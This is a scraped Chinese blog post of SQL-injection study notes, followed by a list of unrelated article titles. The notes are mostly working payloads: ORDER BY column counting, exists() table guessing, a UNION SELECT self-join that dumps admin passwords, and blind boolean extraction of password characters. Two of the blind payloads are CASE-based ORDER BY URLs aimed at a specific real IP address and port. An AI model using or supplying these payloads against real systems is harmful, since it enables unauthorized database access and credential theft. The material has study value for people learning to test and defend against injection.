注入学习
来源:互联网 发布:什么是云计算概念 编辑:程序博客网 时间:2024/06/10 14:05
1 先查当前文章字段 :
order by 11 //以多少字段排序 正常的最大的那个就是字段数
2 猜表名
and exists(select * from admin) //猜有无 admin
3 猜表中字段
and exists(select * from admin order by 4) //找出admin 字段
4 不知道admin中其他字段 去得到密码
and 1=2 union select 1,2,3,* from admin as a inner join admin as b on a.id=b.id //admin为4个字段 总共11字段 11-4*2 = 3 这样在页面上出现admin 和密码
5 搜索行 字符注入
'%xxxxx%'
%' and (select top 1 asc(mid(pass,1,1)) from manager)=84 and '%'=' 84// manager 是表名 pass是列名 都是猜的 先猜表名 再猜字段名
6
http://222.18.158.62:8080/2/index1.php?order_by=(case when ((select length(password) from admin where id=1) >=8) then id else user end) //判断有几位
http://222.18.158.62:8080/2/index1.php?order_by=(case when (ord(mid((select password from admin where id=1),1,1))>=51) then id else user end) //判断第几位
- 注入学习
- (学习)SQL注入-POST注入
- 学习sql注入
- 学习:DLL远程注入
- 关于SQL注入学习
- 学习SQL注入
- sql注入 学习
- dll注入学习
- MSSQL注入学习笔记
- 学习笔记:网站注入
- Dll注入学习笔记
- SQL注入学习----检测
- SQL注入的学习
- SetWindowsHookEx注入学习笔记
- Spring 学习-------依赖注入
- 进程注入学习
- 牛腩学习---SQL注入
- c++线程注入学习
- esper 对doc的翻译和注解
- android] TextView文本的 “选择文字”“复制” “
- Everything 使用说明书(Everything FAQ)
- opencv KNN 模型不能保存的问题
- cocos2d-x分数的显示
- 注入学习
- android LinearLayout添加分隔线
- C++STRING类常用函数
- Zigbee 设置信道,PANID,发射功率
- hibernate简单的编程步骤
- Android远程图片获取和本地缓存
- mybatis中的#和$的区别
- ios利用Reachability确认网络环境3G/WIFI
- C# 配置文件读取与修改